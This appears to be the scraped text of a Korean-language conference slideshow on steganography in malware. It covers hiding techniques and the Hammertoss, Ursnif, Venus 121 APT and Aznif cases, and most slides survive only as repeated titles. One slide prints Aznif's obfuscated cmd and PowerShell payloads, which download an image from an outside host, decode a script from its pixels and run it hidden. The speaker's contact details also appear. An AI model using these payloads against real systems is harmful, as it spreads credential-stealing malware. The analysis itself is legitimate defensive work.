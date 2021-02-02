Successfully reported this slideshow.
Analysis Steganography in Malware Speaker : Seunghyung, Lee
Q & A Speaker : Seunghyung, Lee Mail : lsh970804@gmail.com / H.P : 010-4529-9351
  1. 1. Analysis Steganography in Malware Speaker : Seunghyung, Lee
  2. 2. Chapter List K-Hackers Table of Summary Q & A Malware Analysis About Accident What is Steganography? Contents Table of Contents Chapter 1. What is Steganography? Chapter 2. About Accident (News) Chapter 3. Malware Analysis
  3. 3. Section 1. What is Steganography? K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of One Data Hiding Steganography Covert Channels Copyright Marking Anonymity Summary Q & A
  4. 4. Section 2. Steganography : Origin Of a Word K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of One Steganography Graphos Stegano + = 쓰다, 그리다 감추어져 있다 감춰진 글, 비밀메시지 Summary Q & A secret data cover image stego image Sender Receiver cover image secret data
  5. 5. Section 3. Irreversible Data Hiding in Steganography K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of One Irreversible Data Hiding LSB (Least Significant Bit) PVD (Pixel-Value Differencing) Summary Q & A
  6. 6. Section 4. Reversible Data Hiding in Steganography K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of One Summary Q & A p1 p2 . . . 0 1 0 1 0 1 1 0 0 1 0 1 1 1 0 0 . . . 0 1 0 1 0 1 1 1 0 1 0 1 1 1 0 1 7 6 5 4 3 2 1 0 secret data : 1101 . . . gray : 1pixel = 8bits [value : 0 ~ 255] p2 … p1 cover image Embedding algorithm Extracting algorithm secret data 1101 . . . ′ ′ p1 p2
  7. 7. Section 3. Irreversible Data Hiding in Steganography K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of One Irreversible Data Hiding LSB (Least Significant Bit) PVD (Pixel-Value Differencing) Summary Q & A
  8. 8. Section 4. Reversible Data Hiding in Steganography K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of One Reversible Data Hiding HS (Histogram Shifting) DE (Difference Expansion) Summary Q & A
  9. 9. Section 5. File in the Image? K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of One Summary Q & A
  10. 10. Section 1. Steganography About Accident K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Two Summary Q & A
  11. 11. Section 2. Hammertoss About Accident K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Two Summary Q & A
  12. 12. Section 2. Ursnif About Accident K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Two Summary Q & A
  13. 13. Section 1. North Korean Venus 121 APT organization, steganographic techniques K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Summary Q & A
  14. 14. Section 1. North Korean Venus 121 APT organization, steganographic techniques K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Summary Q & A
  15. 15. Section 1. North Korean Venus 121 APT organization, steganographic techniques K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Summary Q & A
  16. 16. Section 1. North Korean Venus 121 APT organization, steganographic techniques K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three JPGE 3H08 Summary Q & A
  17. 17. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 1. North Korean Venus 121 APT organization, steganographic techniques Summary Q & A
  18. 18. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 1. North Korean Venus 121 APT organization, steganographic techniques Summary Q & A
  19. 19. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information Summary Q & A
  20. 20. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information Summary Q & A
  21. 21. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information Summary Q & A
  22. 22. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information First CMD Payload cmd.exe /V:ON/C"set lW=o.crm`VPx57^^l(SEX]L8{- Y=GZU:K%0B[9ia2eb*yftp_/T$j1'vdMF^|CHwk^&)WAIDn+}h4,sg6;3 R""ON&&for %9 in (15,2,70,82,45,78,78,47, // 중략 //,13,78,62,84)do set Rc=!Rc!!lW:~%9,1!&&if %9 geq 84 cmd /C!Rc:~-1334!" Second CMD Payload cmd /CEchO/ $4G7=[tYPE]('MATh') ; $48X7= [type]('SystEm.TExT'+'.ENcoDIng'); .("{1}{0}" -f'lsa') ('a') ("{0}{2}{1}" -f'Newct','-Obje');^^^&("{0}{1}"-f 'Add-Type') -AssemblyName "System.Drawing";${g}=^^^&('a') ("{4}{2}{1}{0}{3}"-f '.BiingwtmapSystem.Dra')((^^^&('a') ("{0}{1}{3}{2}" -f 'Net.','WetbClien')).("{1}{0}" - f'penReadO').Invoke("https://images2.imgbox.com/ca/88/A2ZSlW6S_o.png"));${O}=^^^&('a') ("{0}{1}"-f'Byte','[]') 1860;(0..2)^^^|.('%'){foreach(${x} in(0..619)){${p}=${g}.("{0}{1}" -f 'GetPixel').Invoke(${x},${_});${o}[${_}*620+${X}]=( $4g7::("{1}{0}"-f 'loorF').Invoke((${p}."B"-band15)*16)-bor(${p}."g" - band 15))}};^^^&("{0}{1}" -f'IEX')( ( LS vARIabLE:48x7 ).ValUE::"ascii"."getsTrInG"(${O}[0..1341])) |c:wIndOwsSyStem32CliP.ExE &&CMd.Exe /c powerSHELL -ExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn -nOpROFi -st -NolOgO . ( "{0}{1}{2}" -f 'Add',( "{0}{1}" -f'-','Typ' ),'e' ) -Assem ("{3}{1}{5}{0}{4}{2}" -f ( "{2}{1}{0}" -f'd','.Winem' ),'yssS',( "{2}{1}{0}"-f 'Form','.','ows'),'t') ; ^^^& ( ${eNV`:cOMspec}[4,15,25]-jOIN'') ( ( [SYSteM.WiNDoWs.ForMS.CLIPbOaRd]::("{0}{1}" -f 'G',("{0}{1}" - f'ettExT' ))."iNvoKE"( ) ) ) ; [System.Windows.Forms.Clipboard]::("{0}{1}" -f'Clear' )."iNvOkE"( ) Third CMD Payload CMd.Exe /c powerSHELL -ExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn - nOpROFi -st -NolOgO . ( "{0}{1}{2}" -f 'Add',( "{0}{1}" -f'-','Typ' ),'e' ) -Assem ("{3}{1}{5}{0}{4}{2}" -f ( "{2}{1}{0}" - f'd','.Winem' ),'yssS',( "{2}{1}{0}"-f 'Form','.','ows'),'t') ; ^& ( ${e`NV`:cOMs`pec}[4,15,25]-jOIN'') ( ( [SYSteM.WiNDoWs.ForMS.CLIPbOaRd]::("{0}{1}" -f 'G',("{0}{1}" - f'ettExT' ))."i`Nv`oKE"( ) ) ) ; [System.Windows.Forms.Clipboard]::("{0}{1}" - f'Clear' )."i`NvO`kE"( ) Summary Q & A
  23. 23. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information Summary Q & A
  24. 24. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information Summary Q & A
  25. 25. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information Summary Q & A
  26. 26. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information Summary Q & A
  27. 27. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Three Section 2. Aznif, a malware that steals financial information 1. Web Browser Injection 2. MITB Attack 3. ScreenCapture & Video Grabbing 4. Hidden VNC & Socks Proxy Attack Summary Q & A
  28. 28. K-Hackers Chapter Malware Analysis About Accident What is Steganography? Contents Table of Four ● 스테가노그래피(Steganography)란 데이터를 다른 데이터에 삽입하는 기술 ● 탐지 회피를 목적으로 악성코드 제작자들은 스테가노그래피 기술을 활발히 사용중임 ● 스테가노그래피를 활용한 공격은 멀웨어 감지 툴이나 방어 소프트웨어로 탐지가 매우 힘듬 ● 델 시큐어웍스, “스테가노그래피를 예방할 방법은 소프트웨어 주기적 업데이트 뿐이다” ⇒ 기존의 안티멀웨어 종류의 솔루션보다 수학적이고 통계학적인 방법으로 접근하여 스테가노그래피에 대항하는 연구가 필요함. Summary Summary Q & A
  29. 29. Q & A Speaker : Seunghyung, Lee Mail : lsh970804@gmail.com / H.P : 010-4529-9351

